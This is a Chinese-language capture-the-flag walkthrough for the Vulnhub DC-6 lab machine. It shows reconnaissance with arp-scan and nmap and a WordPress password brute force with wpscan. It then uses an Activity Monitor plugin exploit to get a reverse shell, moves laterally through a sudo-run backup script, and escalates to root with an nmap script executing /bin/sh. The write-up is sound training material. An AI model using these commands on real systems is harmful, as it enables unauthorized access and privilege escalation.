Vulnhub[DC6]
简介
下载
- DC-6.zip (Size: 619 MB)
- Download: http://www.five86.com/downloads/DC-6.zip
- Download (Mirror): https://download.vulnhub.com/dc/DC-6.zip
- Download (Torrent): https://download.vulnhub.com/dc/DC-6.zip.torrent ( Magnet)
信息收集
主机探活
kali中使用arp-scan进行主机探活
arp-scan --interface eth0 192.168.0.0/24
经过筛选可以知道192.168.0.141是DC-6的ip
端口扫描
nmap -sC -sV -p- 192.168.0.141
发现这里只是开了80、22端口
首先从80端口入手
这和之前DC-2是一样的
返回一个错误页面,F12可以看到网页做了一个301永久重定向
修改hosts文件
再次打开正常显示
这里可以看出这又是一个wordpress的页面
然后页面显示的信息跟插件有关
这个题目在官网中还给了线索
CLUE
好吧,这并不是一个真正的线索,但对于那些只想继续工作的人来说,更多的是一些“我们不想花五年时间等待某个过程完成”的建议。
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt 这应该可以为您节省几年时间。 😉
这个线索之后有用的
然后我们还是常规先获取一下用户名
wpscan --url http://wordy/ -e u
能够得到以上用户
然后密码的话就要用到之前官网上给到的提示了
根据提示我们可以得到密码表
然后通过用户名表和密码表爆破后台账号
wpscan --url http://wordy/ -U username.txt -P passwords.txt
找到用户名和密码
登录后台
登录成功,但是其他地方都没有发现有什么问题,但是这个使用了一个插件Activity monitor
渗透
使用msf搜索这个插件
searchsploit activity monitor
这里我们使用第三个
cp /usr/share/exploitdb/exploits/php/webapps/45274.html .
这里我们需要修改的是请求地址和反弹shell的地址
然后python开启http服务并且还要监听9999端口
然后访问127.0.0.1
点击请求
反弹shell成功
然后用python转换成标准的shell
python -c "import pty;pty.spawn('/bin/bash')"
然后在home目录下可以看到四个用户
然后在mark的stuff目录下找到了一个things-to-do.txt文件
这里有graham的密码
我们ssh登录graham
查看当前用户可以执行的操作,发现可以运行jens用户下面的backups.sh
查看backups.sh文件,发现是对web的文件进行打包备份
向backups.sh文件中写入”/bin/bash”,并以jens用户去执行该脚本
脚本执行完成后,可以发现切换到jens用户了
提权
再次查看jens可以执行的操作,发现jens可以在无密码情况下使用nmap命令
这里其实也还有个提示
写入一条命令到getShell,通过nmap运行getShell成功进入root用户
echo 'os.execute("/bin/sh")' > getShell
sudo nmap --script=getShell
提权成功
cd ~
cat theflag.txt